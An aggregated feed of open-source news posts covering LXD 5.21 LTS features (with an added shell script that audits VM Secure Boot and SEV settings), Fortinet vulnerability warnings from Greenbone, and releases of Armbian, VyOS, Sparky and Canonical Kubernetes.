<p>The Qubes OS Project uses the <a href="https://semver.org/">semantic versioning</a> standard. Version numbers are written as <code class="language-plaintext highlighter-rouge"><major>.<minor>.<patch></code>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully <a href="https://www.qubes-os.org/doc/how-to-update/">updating</a> it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> documentation.</p>Qubeshttps://www.qubes-os.org/2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Marginhttps://puri.sm/?p=815622024-03-15T17:50:30+00:00<p>Video Read-through of 2023 Year End Financial Update: Slides and Transcript Welcome to Purism’s Investor Report Fiscal Year End 2023. In this report we’re going to go through an executive summary, profit and loss statement, balance sheet, and then conclusion. Executive Summary: All crowdfunded products have been delivered. This is important because the Librem 5 […]</p>
<p>The post <a href="https://puri.sm/posts/2023-finance-report-profitable-more-assets-than-liabilities-over-9m-in-sales-50-margin/" rel="nofollow">2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Margin</a> appeared first on <a href="https://puri.sm/" rel="nofollow">Purism</a>.</p>Todd Weaverhttps://puri.sm/Armbian Leaflet #19https://www.armbian.com/?post_type=newsflash&p=458972024-03-15T09:48:56+00:00<p><span style="color: #000000;">Dear Armbian Community,</span></p>
<p><span style="color: #000000;"><strong>Here are the latest news!</strong></span></p>
<p><span style="color: #000000;">With each new Armbian release, we bring you plenty of improvements. However, we also encounter some new bugs along the way. While some are our own doing, most come from various sources. Much of the software we distribute is common and maintained by third parties upstream, with our main focus on single board computers.</span></p>
<p><span style="color: #000000;"><strong>Challenges and Improvements</strong></span></p>
<p><span style="color: #000000;">During the first week after the release, we faced some problems with the package repository. Our system is highly automated, but sometimes things don’t go smoothly. While trying to improve things, we accidentally caused a delay in updates for two weeks. We’re working hard to fix these issues and make our processes smoother for the future.</span></p>
<p><span style="color: #000000;"><strong>Rockchip Kernel Developments</strong></span></p>
<p><span style="color: #000000;">We’ve been busy improving <a href="https://github.com/armbian/linux-rockchip/tree/rk-6.1-rkr1" rel="noopener" target="_blank">Rockchip vendor kernels</a>, and we’re currently working on porting and testing their new 6.1.y release.</span></p>
<p><span style="color: #000000;"><strong>KDE Plasma Desktop Integration</strong></span></p>
<p><a href="https://cdn.armbian.com/wp-content/uploads/2022/01/Screenshot_20240312_214825.png"><img alt="KDE Neon" class="alignnone wp-image-45890 size-medium" height="169" src="https://cdn.armbian.com/wp-content/uploads/2022/01/Screenshot_20240312_214825-300x169.png" width="300" /></a></p>
<p><span style="color: #000000;">Even though we were in the final stages of our release cycle, we managed to include the brand new release of the <strong>KDE Plasma desktop</strong>. Now, all supported boards come with KDE Plasma Neon v6.1 desktop images, based on the Ubuntu package base. These images offer the latest stable Armbian kernels and LTS package base, without the bloatware or Snap, giving you the best desktop experience.</span></p>
<p><span style="color: #000000;"><strong>Documentation Enhancement Initiative</strong></span></p>
<p><span style="color: #000000;">We’re committed to improving our documentation. We’ve updated our <em>Pull Request templates</em> to make it easier for people to contribute. If you’re interested in helping us improve our documentation, join our upcoming</span> <a href="https://forum.armbian.com/events/event/47-armbian-documentation-follow-up/" rel="noopener" target="_blank">Documentation Follow-up Meeting</a> <span style="color: #000000;">for more collaboration. </span></p>
<p><span style="color: #000000;">Stay tuned for more updates and improvements!</span></p>
<p><span style="color: #000000;">The Armbian team.</span></p>Igor Pečovnikhttps://www.armbian.comUbuntu Blog: LXD 5.21.0 LTS is now availablehttps://ubuntu.com//blog/lxd_5-21-0_lts2024-03-15T09:41:25+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="671" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1195,h_671/https://ubuntu.com/wp-content/uploads/3b73/LXD-LTS.png" width="1195" />
</noscript>
</div>
LXD 5.21.0 is now available</figure>
<p>The stable release of LXD, <a href="https://canonical.com/lxd">the system container and VM manager</a>, is now available. LXD 5.21 is the fifth LTS release for LXD, and will be supported for 5 years, until June 2029. This release significantly steps up LXD’s abilities in comparison to LXD 5.0 LTS, especially when operating in clustered environments. LXD 5.21.0 will be licensed under AGPL-3.0-only, in line with the change we <a href="https://discourse.ubuntu.com/t/an-update-on-the-licence-change-and-community-image-server/41549">announced last year</a>. The conditions of the license are designed to encourage those looking to modify the software to contribute back to the project and the broader community. We hope you’ll enjoy what’s in store in this release. Before we jump into features, let’s start with some general changes that come with the new LTS.</p>
<h2 class="wp-block-heading">Change of version numbering scheme</h2>
<p>Starting with this release we are changing the numbering scheme. This is the first LTS release that won’t use the n.0.n format, e.g. 6.0.x, and instead it will be 5.21.x. </p>
<p>What we have followed so far is that each LTS would start a new major version (e.g. 5.0) and each monthly feature release would build on that major version (e.g. 5.1 … 5.20). However, that seemed strange from the perspective of the LTS being an accumulation of all the work that has gone into the monthly releases over the past two years. This is why we decided to change the naming scheme to better reflect that the LTS represents the end of the cycle, rather than the beginning. </p>
<p>Going forward, the last of the monthly releases in the two-year LTS cycle will become the next LTS, in this case, 5.21.0. Then, we will restart the cycle with the first monthly release following the new major version number (e.g. 6.x). To avoid unexpected results for people who assumed the next LTS series would be 6.0.x we will not be releasing LXD 6.0, and the next feature release after this one will be LXD 6.1.</p>
<h2 class="wp-block-heading">LXD UI is now available by default</h2>
<p>As we <a href="https://ubuntu.com/blog/lxd_ui">announced</a>, we now have a dedicated team working on the LXD graphical user interface. We are happy to share that the LXD UI is deemed production grade and is now enabled by default in the LXD snap. We will continue to work on ensuring feature parity of the UI with the CLI. </p>
<p>Keep in mind that the external listener must still be enabled explicitly by setting core.https_address as outlined in the <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/access_ui/">documentation</a>.</p>
<h2 class="wp-block-heading">What’s new in LXD 5.21.0 LTS?</h2>
<p>Over the past two years, we have steadily been enhancing LXD capabilities to become an even more robust and featureful infrastructure tool. In addition to general features, some of the areas we are addressing are aimed at clustered environments, such as when deploying our newly launched <a href="https://canonical.com/microcloud">MicroCloud</a> solution, which builds on LXD. </p>
<h3 class="wp-block-heading">Authentication and authorization revamp </h3>
<p>As part of a push to provide a more industry-standard solution to authentication and authorization in LXD, we’ve added support for OpenID Connect for authentication and additional mechanisms for fine-grained authorization. The combination of these features will allow users to perform secure authentication and fine-grained access control. With the features completed in LXD, this will also be added to the UI in the coming months.</p>
<p>Please note that due to the change in the database, all users who currently authenticate to LXD with OIDC will temporarily lose access to their cluster, and will have to follow <a href="https://documentation.ubuntu.com/lxd/en/latest/api-extensions/#access-management">these steps to authenticate</a>. </p>
<p>More information is available in the documentation about <a href="https://documentation.ubuntu.com/lxd/en/latest/authentication/#openid-connect-authentication">OIDC</a> and <a href="https://documentation.ubuntu.com/lxd/en/latest/explanation/authorization/">fine-grained authorization</a>. </p>
<p>As part of this work, the support for Canonical’s Candid RBAC service has been removed as it is in the process of being deprecated. LXD still supports external OIDC and TLS certificates for authentication.</p>
<h3 class="wp-block-heading">Storage enhancements: Object storage and PowerFlex support</h3>
<p>To cover a wider variety of use cases, we are continuously evaluating adding new storage options and enhancing existing ones. In this LTS, we added support for object storage as well as support for Dell PowerFlex as another option for remote storage.</p>
<h4 class="wp-block-heading">Object storage on Ceph and local storage pools</h4>
<p>LXD now has support for object storage.</p>
<p>We’ve achieved this by adding a whole new concept of storage buckets along with a dedicated command (lxc storage bucket) and APIs. This allows LXD users to create new storage buckets, assign them a size limit and then manage access keys to that bucket. The bucket has its own URL with an S3 API.</p>
<p>For Ceph, we are using its rados gateway providing the S3 API.</p>
<p>For other storage drivers, we are using the <a href="https://min.io/">MinIO project</a>, which lets us offer an S3-compatible API directly from a local storage driver. Please note that this requires an externally provided MinIO server binary, configured through the minio.path setting.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/storage_buckets/">How to manage storage buckets and keys</a> and <a href="https://documentation.ubuntu.com/lxd/en/latest/reference/storage_cephobject/">Ceph Object storage driver</a></p>
<h4 class="wp-block-heading">Dell PowerFlex</h4>
<p>There are various enablement activities between Dell and Canonical as a part of our ongoing partnership. The latest of them is adding support for LXD to interface directly with its PowerFlex service in order to allow LXD instances to be run on its platform. This offers an alternate remote storage option for enterprise use cases, where currently supported storage drivers may not be preferred.</p>
<p>Due to its design, PowerFlex is another LXD storage driver offering remote storage capabilities similar to the already existing implementation for Ceph RBD. </p>
<p>More information can be found in <a href="https://documentation.ubuntu.com/lxd/en/latest/reference/storage_powerflex/">the documentation</a>.</p>
<h3 class="wp-block-heading">Virtual Machines: Live migration, AMD SEV, non-UEFI support and ISO volumes</h3>
<p>Since introducing support for virtual machines 4 years ago we’ve been adding a variety of features to not only ensure feature parity with system containers but also make sure to cover a wide range of our users’ use cases. Some of the highlights for this LTS are support for live migration, non-UEFI VMs and ISO volumes, as well as enabling AMD SEV.</p>
<h4 class="wp-block-heading">Fast live migration for virtual machines</h4>
<p>This release enables a much-improved VM live migration process, eliminating much of the perceivable downtime. Previously, LXD relied on the stateful stop function, which is the ability to write all the running memory and CPU state to disk, then stop the virtual machine, move it to a new system and start it back up again from where it was using the stored state. The improved functionality, on the other hand, allows the source and target servers to communicate right from the start of the migration. This allows for performing any state transfer in the background directly to the target host while the VM is still running, then transferring any remaining disk changes as well as the memory through multiple iterations of the migration logic and finally cutting over to the target system.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/move_instances/#live-migration-vms">Live migration for virtual machines</a></p>
<h4 class="wp-block-heading">AMD SEV support for virtual machines</h4>
<p>LXD now supports AMD SEV for memory encryption of virtual machines.</p>
<p>On compatible systems (AMD EPYC with firmware and kernel support enabled), setting security.sev to true encrypts the VM’s memory with a per-VM key handled by the firmware.</p>
<p>Systems supporting AMD SEV-ES can then turn on security.sev.policy.es to also have the CPU state encrypted for extra security.</p>
<p>Lastly, LXD also supports feeding custom session keys. Combined with LXD’s existing vTPM support, this feature can be used to ensure that the firmware is set up with those user provided keys and that the host operator doesn’t have any ability to tamper with the VM.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/reference/instance_options/#security-policies">Instance security options</a></p>
<h4 class="wp-block-heading">Non-UEFI support in LXD VMs (CSM)</h4>
<p>LXD virtual machines have been designed to use a very modern machine definition from the start. This means LXD VMs offer a QEMU Q35 machine type combined with a UEFI firmware (EDK2) and even Secure Boot enabled by default.</p>
<p>While this works great for modern operating systems, it can be a problem when migrating existing physical or virtual machines into LXD as those machines may be using a legacy firmware (BIOS) and not be bootable under UEFI.</p>
<p>This can now be addressed by setting security.csm to true combined with disabling UEFI Secure Boot by setting security.secureboot to false. This switches QEMU to boot via SeaBIOS directly rather than through EDK2.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/api-extensions/#security-csm">Security CSM</a></p>
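<p>The VM options described above for AMD SEV and for legacy (CSM) boot, as an added example that is not part of the LXD announcement or the LXD code base: a POSIX shell audit that reads the YAML printed by <code>lxc config show --expanded</code> and reports VMs with legacy BIOS boot, Secure Boot turned off, or no memory encryption. The function names and the sample YAML are constructed for illustration, and a missing-SEV finding only matters on SEV-capable hosts.</p>

```shell
#!/bin/sh
# Added example (not LXD project code): audit VM boot and memory-encryption
# options from the YAML printed by `lxc config show <vm> --expanded`.

# Print the value of KEY from the top-level "config:" map of the YAML on stdin.
# Prints nothing when the key is unset.
config_value() {
    awk -v key="$1" '
        /^[^ #]/ { in_config = ($0 ~ /^config:/); next }  # top-level section header
        in_config && !found && $1 == (key ":") {
            val = $0
            sub(/^[^:]*:[ \t]*/, "", val)   # strip the leading "  key: "
            gsub(/^"|"$/, "", val)          # strip surrounding double quotes
            print val
            found = 1
        }'
}

# Boolean spellings LXD accepts for config values.
is_true() {
    case $(printf '%s' "$1" | tr 'A-Z' 'a-z') in true|1|yes|on) return 0 ;; esac
    return 1
}
is_false() {
    case $(printf '%s' "$1" | tr 'A-Z' 'a-z') in false|0|no|off) return 0 ;; esac
    return 1
}

# Read one VM's expanded config on stdin; print one finding per line.
# Prints nothing when Secure Boot is left on and SEV plus SEV-ES are enabled.
audit_vm() {
    name=$1
    yaml=$(cat)
    csm=$(printf '%s\n' "$yaml" | config_value security.csm)
    sboot=$(printf '%s\n' "$yaml" | config_value security.secureboot)
    sev=$(printf '%s\n' "$yaml" | config_value security.sev)
    sev_es=$(printf '%s\n' "$yaml" | config_value security.sev.policy.es)

    if is_true "$csm"; then
        echo "$name: legacy-bios (security.csm=$csm, boots via SeaBIOS instead of EDK2)"
    fi
    if is_false "$sboot"; then
        echo "$name: secureboot-off (security.secureboot=$sboot)"
    fi
    if ! is_true "$sev"; then
        echo "$name: no-sev (guest memory is not encrypted)"
    elif ! is_true "$sev_es"; then
        echo "$name: no-sev-es (memory encrypted, CPU state is not)"
    fi
    return 0
}

# Live use: audit the named VMs through the lxc client.
audit_vms() {
    for vm in "$@"; do
        lxc config show "$vm" --expanded </dev/null | audit_vm "$vm"
    done
}

# Constructed sample: VM imported from legacy hardware, booted with CSM.
sample_legacy_vm() {
    cat <<'EOF'
architecture: x86_64
config:
  limits.memory: 4GiB
  security.csm: "true"
  security.secureboot: "false"
devices:
  root:
    path: /
    pool: default
    type: disk
profiles:
- default
EOF
}

# Constructed sample: SEV and SEV-ES enabled, Secure Boot left at its default.
sample_sev_vm() {
    cat <<'EOF'
architecture: x86_64
config:
  security.sev: "true"
  security.sev.policy.es: "true"
devices: {}
profiles:
- default
EOF
}

# Constructed sample: SEV enabled, SEV-ES left off.
sample_sev_only_vm() {
    cat <<'EOF'
architecture: x86_64
config:
  security.sev: "true"
devices: {}
EOF
}

# Demo on the constructed samples.
sample_legacy_vm   | audit_vm legacy-import
sample_sev_vm      | audit_vm sev-guest
sample_sev_only_vm | audit_vm sev-only
```

<p>On a live host, pass the VM names to <code>audit_vms</code>; containers are not covered because these options apply to virtual machines.</p>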
<h4 class="wp-block-heading">ISO volumes</h4>
<p>It is now possible to upload ISO image files as custom storage volumes. These can then be attached to a virtual machine as a bootable CD disk allowing simplified installation of custom operating systems from a “library” of custom ISO volumes.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/instances_create/#launch-a-vm-that-boots-from-an-iso">Launch a VM that boots from an ISO</a></p>
<h3 class="wp-block-heading">Instance placement scriptlet</h3>
<p>The instance placement scriptlet feature was added to enable a better alternative to LXD’s default instance placement algorithms. Instead of the default behavior of placing a new instance on whichever cluster member was hosting the fewest instances, this new feature allows users to make a more deliberate choice. Now, users can provide a Starlark scriptlet that decides which cluster member to deploy the new instance on based on information about the new requested instance as well as a list of candidate cluster members. Importantly, while scriptlets are able to access certain information about the instance and the cluster, they cannot access any local data, hit the network or even perform complex time-consuming actions.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/explanation/clustering/#instance-placement-scriptlet">Instance placement scriptlet</a></p>
<h3 class="wp-block-heading">Cluster auto-healing</h3>
<p>This feature was commonly requested by those using LXD with Ceph and OVN: LXD can now automatically recover from a cluster member failure by effectively evacuating all instances to other systems.</p>
<p>This can only work with Ceph backed instances which don’t rely on any server-specific device or configuration.</p>
<p>This is controlled by a new cluster.healing_threshold setting, which defines the number of seconds after which a cluster member is considered to be offline and its instances are relocated.</p>
<p>Documentation: <a href="https://documentation.ubuntu.com/lxd/en/latest/howto/cluster_manage/#automatic-evacuation">Automatic cluster evacuation</a></p>
<h3 class="wp-block-heading">Shiftfs support has been removed</h3>
<p>Following the removal of shiftfs from the Ubuntu kernel (from Mantic onwards), LXD has now also dropped support for shiftfs. The preferred way for container filesystems to have their UID/GID mappings dynamically shifted is with idmapped mounts. In recent kernels this is now supported for the ZFS and CephFS filesystems (in addition to the long-standing support for the ext4, xfs and btrfs filesystems).</p>
<p>The features outlined above are only the major highlights of this release. You can read the detailed announcement with a complete changelog on our <a href="https://discourse.ubuntu.com/t/lxd-5-21-0-lts-has-been-released/42476">discourse</a>. </p>
<p><em>To get started with LXD, follow the</em><a href="https://documentation.ubuntu.com/lxd/en/latest/tutorial/first_steps/"><em> get started guide</em></a><em>.</em></p>
<p><em>Learn more about LXD on the </em><a href="https://canonical.com/lxd"><em>LXD webpage</em></a><em>.</em></p>Ubuntu developershttp://planet.ubuntu.com/Chinese hackers and Fortinet vulnerabilities: Warnings from US governmenthttps://www.greenbone.net/?p=402972024-03-15T06:57:17+00:00<p>For several years in a row, the Californian manufacturer Fortinet has been in the public focus due to serious security problems. Known for its secure firewall, VPN and intrusion detection devices, the cyber security expert was again forced to announce several highly critical security vulnerabilities in February 2024.</p>
<p>Staying informed and applying patches promptly is what companies need to proactively protect themselves against such attacks. Products such as Greenbone’s Enterprise Appliances play a central role in this and are meant to help admins. All the vulnerabilities mentioned in this blog post are covered by tests from the Greenbone Enterprise Feed: active procedures check whether the exploit is possible, and versioning tests will deliver results about the success of patch management.</p>
<p><img alt="" class="alignnone size-full wp-image-40371" height="450" src="https://www.greenbone.net/wp-content/uploads/tracking-news-fortinet.jpg" width="1050" /></p>
<p><strong>87,000 passwords: Fortinet wins “Vulnerability of the Year 2022”</strong></p>
<p>In 2019, <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379" rel="noopener external noreferrer" target="_blank">CVE-2018-13379<span class="wpel-icon wpel-image wpel-icon-19"></span></a> (CVSS 9.8) allowed over 87,000 passwords for the Fortinet VPN to be read from the devices. In the following years, this vulnerability was exploited so successfully that in 2022 it was awarded the dubious title of “<a class="wpel-icon-right" href="https://thehackernews.com/2023/08/major-cybersecurity-agencies.html" rel="noopener external noreferrer" target="_blank">most exploited vulnerability of 2022<span class="wpel-icon wpel-image wpel-icon-19"></span></a>”. The US authorities reacted and urged all of their clients to be more aware of the problem: the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) warned that many customers did not <a class="wpel-icon-right" href="https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities" rel="noopener external noreferrer" target="_blank">apply patches promptly<span class="wpel-icon wpel-image wpel-icon-19"></span></a>. Again, lack of foresight turned out to be one of the main reasons. According to the agencies, patching would have prevented many of the successful attacks.</p>
<p><strong>2023: Unwanted guests in critical networks</strong></p>
<p>What makes it worse is that Fortinet devices are mostly used in security-critical areas. Unpatched and carrying serious vulnerabilities, such devices have become the focus of attackers in recent years, especially state actors. In 2023, for example, Chinese hacker groups successfully infiltrated <a class="wpel-icon-right" href="https://www.reuters.com/technology/cybersecurity/china-cyber-spies-hacked-computers-dutch-defence-ministry-report-2024-02-06/" rel="noopener external noreferrer" target="_blank">Dutch military networks<span class="wpel-icon wpel-image wpel-icon-19"></span></a> via a vulnerability in the FortiOS SSL VPN from December 2022 that had already been patched for a while <a class="wpel-icon-right" href="https://thehackernews.com/2022/12/fortinet-warns-of-active-exploitation.html" rel="noopener external noreferrer" target="_blank">(CVE-2022-42475<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, CVSS 9.3).</p>
<p>Even though the network was only used for research and development according to the Military Intelligence and Security Service <a class="wpel-icon-right" href="https://www.defensie.nl/onderwerpen/militaire-inlichtingen-en-veiligheid/nieuws/2024/02/06/mivd-onthult-werkwijze-chinese-spionage-in-nederland" rel="noopener external noreferrer" target="_blank">(MIVD<span class="wpel-icon wpel-image wpel-icon-19"></span></a>), the attacks published at the beginning of February made it clear how easy it is for attackers to penetrate even highly protected networks. Even worse, the corresponding backdoor “Coathanger” allows attackers to gain permanent access to devices once they have been hacked, all thanks to CVE-2022-42475, which allows the execution of arbitrary code.</p>
<p><strong>February 2024: Warnings of further vulnerabilities, maximum severity</strong></p>
<p>Unfortunately, the story does not end here: Fortinet also had to admit another serious vulnerability at the beginning of February 2024: <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-21762" rel="noopener external noreferrer" target="_blank">CVE-2024-21762<span class="wpel-icon wpel-image wpel-icon-19"></span></a> (CVSS score: 9.6) allows unauthorized attackers to execute arbitrary code via specially adapted requests. <a class="wpel-icon-right" href="https://fortiguard.fortinet.com/psirt/FG-IR-24-015" rel="noopener external noreferrer" target="_blank">A long list of versions<span class="wpel-icon wpel-image wpel-icon-19"></span></a> of the Fortinet operating system FortiOS and FortiProxy are affected. The manufacturer advises upgrading or deactivating the SSL VPN and warns of both the severity of the vulnerability and the fact that it is already being massively exploited by attackers.</p>
<p>Fortinet seemed to have some organizational issues, too. <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-23108" rel="noopener external noreferrer" target="_blank">CVE-2024-23108<span class="wpel-icon wpel-image wpel-icon-19"></span></a> and <a class="wpel-icon-right" href="https://nvd.nist.gov/vuln/detail/CVE-2024-23109" rel="noopener external noreferrer" target="_blank">CVE-2024-23109<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, published just a few days later, sounded just as bad: they also allow unauthenticated attackers to execute arbitrary code. However, these CVEs have to be taken with a grain of salt: the fact that two CVEs from the same manufacturer received a 10.0 on the threat severity scale on the same day is probably unique and raised some experts’ eyebrows. Apart from that, the confusing communication from the vendor was <a class="wpel-icon-right" href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-fortisiem-rce-bugs-in-confusing-disclosure/" rel="noopener external noreferrer" target="_blank">not really likely to establish or further trust<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, and neither was the strange story of <a class="wpel-icon-right" href="https://www.bleepingcomputer.com/news/security/no-3-million-electric-toothbrushes-were-not-used-in-a-ddos-attack/" rel="noopener external noreferrer" target="_blank">toothbrush-based attacks told by a Fortinet employee<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, which reached the mass media at the same time.</p>
<p><strong>Fatal combination – vulnerability management can help</strong></p>
<p>As always, Fortinet published patches promptly, but customers also have to install them. Again, the combination of serious security vulnerabilities, lack of awareness and the absence of patches showed its full impact: only a few days later, the US government pushed out another advisory from CISA, NSA and FBI about <a class="wpel-icon-right" href="https://www.reuters.com/technology/what-is-volt-typhoon-alleged-china-backed-hacking-group-2023-05-25/" rel="noopener external noreferrer" target="_blank">Volt Typhoon<span class="wpel-icon wpel-image wpel-icon-19"></span></a>, a Chinese state hacker group. The US government had evidence that these attackers had permanently embedded themselves in critical infrastructure of US authorities for many years via such vulnerabilities. According to the warning, the associated risks should not be underestimated.</p>
<p>The security by design required there also includes the constant monitoring of one’s own servers, computers and installations with vulnerability tests such as those of Greenbone Enterprise Appliances. Those who constantly monitor their networks (not just Fortinet devices) with the vulnerability tests of a modern vulnerability scanner can inform their administrators as quickly as possible if known CVEs in an infrastructure are waiting for patches, reducing the attack surface.</p>
Markus Feilnerhttps://www.greenbone.net/en/VyOS 1.4.0-epa2https://blog.vyos.io/vyos-1.4.0-epa2-release2024-03-15T00:36:40+00:00<div class="hs-featured-image-wrapper">
<a class="hs-featured-image-link" href="https://blog.vyos.io/vyos-1.4.0-epa2-release" title=""> <img alt="VyOS 1.4.0-epa2" class="hs-featured-image" src="https://blog.vyos.io/hubfs/VyOS%201.4.0-epa2%20release.png" style="width: auto !important; float: left; margin: 0 15px 15px 0;" /> </a>
</div>
<p>Hello, Community!</p>
<p>VyOS 1.4.0-epa2 <span>image is now available to customers and contributors (and <a href="https://docs.vyos.io/en/sagitta/contributing/build-vyos.html">everyone can build it</a> from the sagitta branch of <a href="https://github.com/vyos/vyos-build/">vyos-build</a>, of course)! If you are new to VyOS, the "EPA" part means "early production access" — the final stage when the release is already used in production by a subset of users and on our proper infrastructure. This is the second release on the path to the final stabilization of the 1.4.0/Sagitta branch. It mainly features bug fixes but contains minor features </span></p>Daniil Baturindaniil@sentrium.ioSparky 7.3https://sparkylinux.org/?p=122922024-03-14T21:17:51+00:00<p>The 3rd update of Sparky 7 – 7.3 is out.</p>
<p>It is a quarterly updated point release of Sparky 7 “Orion Belt” of the stable line. Sparky 7 is based on and fully compatible with Debian 12 “Bookworm”.</p>
<p>Changes:<br />
– all packages updated from Debian and Sparky stable repos as of March 13, 2024<br />
– Linux kernel PC: 6.1.67 LTS (6.8.0, 6.6.21-LTS & 5.15.151-LTS in sparky repos)<br />
– Linux kernel ARM: 6.6.20 LTS<br />
– LibreOffice 7.4.7<br />
– KDE Plasma 5.27.5<br />
– LXQt 1.2.0<br />
– MATE 1.26<br />
– Xfce 4.18<br />
– Openbox 3.6.1<br />
– Firefox 115.8.0esr (123.0.1-sparky in sparky repos)<br />
– Thunderbird 115.8.0<br />
– VLC 3.0.20<br />
– Exaile 4.1.3<br />
– added new application (amd64 only): <a href="https://sparkylinux.org/noi-imaginer/">Noi</a> – a chatbot GUI application with support for ChatGPT, Claude, Bard, Poe, Perplexity, Copilot, HuggingChat, Pi, Coze and YOU. </p>
<p>Sparky 7.3 “Orion Belt” is available in the following versions:<br />
– amd64 BIOS/UEFI+Secure Boot: Xfce, LXQt, MATE, KDE Plasma, MinimalGUI (Openbox) & MinimalCLI (text mode)<br />
– i686 non-pae BIOS/UEFI (Legacy): MinimalGUI (Openbox) & MinimalCLI (text mode)<br />
– ARMHF & ARM64 Openbox & CLI</p>
<p>Note that ‘os-prober’ is not executed by default to detect other bootable partitions, but Sparky provides a GRUB option to detect other OSes anyway.<br />
However, the next update of the GRUB packages overrides that option.<br />
To fix that manually, add the line:<br />
<code>GRUB_DISABLE_OS_PROBER=false</code><br />
at the end of the file (as root):<br />
<code>/etc/default/grub</code><br />
Then update grub:<br />
<code>sudo update-grub</code></p>
<p>PC live user:password = live:live<br />
ARM user:password = pi:sparky</p>
<p>If you have Sparky 7 installed – simply keep it up to date. No need to reinstall your OS.</p>
<p>New iso images of Sparky 7 “Orion Belt” can be downloaded from the <a href="https://sparkylinux.org/download/stable/">download/stable</a> page</p>
<p>Release information in Polish: <a href="https://linuxiarze.pl/sparky-7-3/">https://linuxiarze.pl/sparky-7-3/</a></p>
pavroohttps://sparkylinux.orgUbuntu Blog: How should a great K8s distro feel? Try the new Canonical Kubernetes, now in betahttps://ubuntu.com//blog/try-canonical-kubernetes-beta2024-03-14T13:06:16+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="627" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1200,h_627/https://ubuntu.com/wp-content/uploads/e0c0/infrastructure-maintenance.png" width="1200" />
</noscript>
</div>
</figure>
<p>Kubernetes revolutionised container orchestration, allowing faster and more reliable application deployment and management. But even though it transformed the world of DevOps, it introduced new challenges around security maintenance, networking and application lifecycle management. </p>
<p>Canonical has a long history of providing production-grade Kubernetes distributions, which gave us great insights into Kubernetes’ challenges and the unique experience of delivering K8s that match the expectations of both developers and operations teams. Unsurprisingly, there is a world of difference between them. Developers need a quick and reproducible way to set up an application environment on their workstations. Operations teams with clusters powering the edge need lightweight high-availability setups with reliable upgrades. Cloud installations need intelligent cluster lifecycle automation to ensure applications can be integrated with each other and the underlying infrastructure.</p>
<p>We provide two distributions, Charmed Kubernetes and MicroK8s, to meet those different expectations. <a href="https://ubuntu.com/kubernetes/charmed-k8s">Charmed Kubernetes</a> wraps upstream K8s with software operators to provide lifecycle management and automation for large and complex environments. It is also the best choice if the Kubernetes cluster has to integrate with custom storage, networking or GPU components. <a href="http://microk8s.io">MicroK8s</a> has a thriving community of users; it is a production-grade, ZeroOps solution that powers laptops and edge environments. It is the simplest way to get Kubernetes anywhere and focus on software product development instead of working with infrastructure routines and operations.</p>
<p>After providing Kubernetes distributions for over seven years, we decided to consolidate our experience into a new distribution that combines the best of both worlds: ZeroOps for small clusters and intelligent automation for larger production environments that also want to benefit from the latest community innovations.</p>
<p>Canonical Kubernetes will be our third distribution and an excellent foundation for future MicroK8s and Charmed Kubernetes releases. You can find its beta in our Snap Store under the simple name <a href="https://snapcraft.io/k8s"><em>k8s</em></a>. We based it on the latest upstream Kubernetes 1.30 beta, which officially came out on 12 March. It will be a CNCF conformant distribution with an enhanced security posture and best-in-class open source components for the most demanding user needs: network, DNS, metrics server, local storage, ingress, gateway, and load balancer.</p>
<h2 class="wp-block-heading">ZeroOps with the most essential features built-in</h2>
<p>Canonical Kubernetes is easy to install and easy to maintain. Like MicroK8s, Canonical Kubernetes is installed as a snap, giving developers a great installation experience and advanced security features such as automated patch upgrades. Adding new nodes to your cluster comes with minimum hassle. It also provides a quick way to set up high availability.</p>
<p>You need two commands to get a single node cluster, one for installation and another for cluster bootstrap. You can try it out now on your console by installing the <a href="https://snapcraft.io/k8s"><em>k8s</em> snap</a> from the beta channel:</p>
<pre class="wp-block-code"><code>sudo snap install k8s --channel=1.30-classic/beta --classic
sudo k8s bootstrap</code></pre>
<p>If you look at the status of your cluster just after bootstrap – with the help of the <em>k8s status</em> command – you might immediately spot that the <em>network</em>, <em>dns</em>, and <em>metrics-server</em> are already running. In addition to those three, Canonical Kubernetes also provides <em>local-storage</em>, <em>ingress</em>, <em>gateway</em>, and <em>load-balancer,</em> which you can easily enable. Under the hood, these are powered by Cilium, CoreDNS, OpenEBS, and Metrics Server. We bundle these as built-in features to ensure tight integration and a seamless experience. We want to emphasise standard Kubernetes APIs and abstractions to minimise disruption during upgrades while enabling the platform to evolve.</p>
<p>All our built-in features come with default configurations that make sense for the most popular use cases, but you can easily change them to suit your needs.</p>
<h2 class="wp-block-heading">Same Kubernetes for developer workstations, edge, cloud and data centres</h2>
